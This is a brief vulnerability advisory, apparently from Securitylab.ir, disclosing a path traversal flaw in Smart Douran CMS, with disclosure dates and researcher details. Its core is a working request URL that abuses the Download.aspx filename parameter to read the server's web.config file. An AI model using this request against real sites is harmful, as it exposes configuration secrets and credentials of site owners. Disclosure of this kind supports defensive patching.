Smart Douran CMS suffers from a remote file disclosure vulnerability.
bd0c8d16f0db26a6b515c42ce23cbfd05aabc23a18d8c23f90acdc5f9fb76a23
#################################################################
# Securitylab.ir
#################################################################
# Application Info:
# Name: Smart Douran CMS
# Vendor: http://smartdouran.ir
#################################################################
# Vulnerability Info:
# Type: Remote File Download
# Risk: Medium
# 2008-08-11 - Found Vulnerability
# 2010-05-19 - Public disclosure
#################################################################
Vulnerability:
http://site.com/Admin/ImportExport/Download.aspx?filename=../../web.config
#################################################################
# Discoverd By: Pouya Daneshmand
# Website: http://Pouya.Securitylab.ir
# Contacts: info[at]securitylab.ir & whh_iran[at]yahoo.com
###################################################################